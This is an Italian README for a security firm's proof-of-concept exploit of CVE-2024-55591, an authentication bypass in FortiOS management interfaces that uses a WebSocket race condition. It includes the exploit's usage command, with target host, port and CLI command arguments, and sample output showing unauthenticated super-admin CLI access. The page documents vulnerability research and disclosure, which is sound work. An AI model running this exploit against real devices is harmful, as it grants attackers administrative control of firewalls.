
Proof-of-concept per CVE-2024-55591, che dimostra un bypass dell'autenticazione nelle interfacce di gestione FortiOS tramite una race condition WebSocket per eseguire comandi CLI senza autenticazione.
Un Proof of Concept per il Bypass di Autenticazione di Fortinet FortiOS
Vedi il nostro post sul blog per i dettagli tecnici
python CVE-2024-55591-PoC.py --host 192.168.1.5 --port 443 --command "get system status" --user watchTowr --ssl
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \\| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \\___| Y | |( <_> \ / | | \
\/\_/ (____ |__| \\\\___ |___|__|__ | \\__ / \\/\_/ |__|
\\ \\ \\
CVE-2024-55591.py
(*) Fortinet FortiOS Authentication Bypass (CVE-2024-55591) POC by watchTowr
- Sonny , watchTowr ([email protected])
CVEs: [CVE-2024-55591]
[*] Checking if target is a FortiOS Management interface
[*] Target is confirmed as a FortiOS Management interface
[*] Target is confirmed as vulnerable to CVE-2024-55591, proceeding with exploitation
Output from server: �m"watchTowr" "admin" "watchTowr" "super_admin" "watchTowr" "watchTowr" [13.37.13.37]:1337 [13.37.13.37]:1337
Output from server: �
get system status
Output from server: �~�FAKESERIAL # "Local_Process_Access" "Local_Process_Access" "root" "" "" "none" [x.x.x.x]:54546 [x.x.x.x]:443
Unknown action 0
FAKESERIAL #
FAKESERIAL # get system status
Version: FortiGate-VM64-AWS v7.0.16,build0667,241001 (GA.M)
Security Level: High
Firmware Signature: certified
Virus-DB: 1.00000(2018-04-09 18:07)
Questo script è un proof of concept per CVE-2024-55591, che prende di mira le interfacce di gestione FortiOS (Fortigate). Creando connessioni WebSocket brute force per generare una condizione di competizione (race condition) insieme a un bypass di autenticazione, è possibile inviare comandi CLI di FortiOS senza autenticazione. Maggiori dettagli sono descritti nel nostro [post sul blog] (https://labs.watchtowr.com/).
Maggiori dettagli nell'avviso di Fortinet
Questo script non è progettato per funzionare con FortiProxy, poiché i controlli preliminari determinano se l'istanza è un'interfaccia di gestione FortiGate, ma si presume che la tecnica sottostante sia applicabile ai dispositivi FortiProxy interessati.
Per le ultime ricerche sulla sicurezza segui il team dei watchTowr Labs